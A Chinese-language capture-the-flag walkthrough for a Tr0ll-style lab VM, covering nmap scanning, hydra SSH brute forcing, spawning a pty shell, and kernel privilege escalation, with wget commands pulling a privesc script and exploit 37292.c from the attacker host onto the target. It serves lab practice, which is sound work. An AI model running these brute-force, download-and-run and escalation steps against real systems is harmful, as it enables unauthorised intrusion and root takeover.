赞
踩
在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。
比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。
那些理论比如sql注入,文件上传等,或者找到相关的系统信息,去网上找相关的exp这些都是为了拿到webshell。
漏洞利用就是使用漏洞拿到webshell。
权限提升,就是所谓的提权,因为一般进入拿到webshell后进入到服务器了都是低权限,在接下来的靶中我们的目标都是拿到root权限,所以拿到webshell后是低权限用户,这个时候我们需要一系列的方式进行提权,最后拿到root权限,即为结束。
nmap -sP 192.168.190.0/24
在上面扫描出的ip地址中,.1、.2、.254、.138都是kali自身的一些ip地址,所以在此确认要进行攻击的靶机的ip地址为:192.168.190.139。
nmap -p- 192.168.190.139
可以看到此靶机开放了21、22、80端口。其中:开放了21端口ftp,可以想到可能存在弱口令;开放了22端口ssh,可以想到对其进行爆破,然后看到80端口web端,可以对其进行常见漏洞测试。
nmap -p- -sS -sV -A 192.168.190.139
hydra -L user -P password 192.168.190.139 ssh
ssh overflow@192.168.190.139
因此还要进行提权,下面是linux提权的几种方式:
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -m http.server 8083
wget http://192.168.190.138:8083/les.sh
- chmod +x les.sh
-
- ./les.sh
uname -a
searchsploit Linux 4-Tr0ll 3.13.0
locate linux/local/37292.c
cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面
wget http://192.168.190.138:8085/37292.c
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。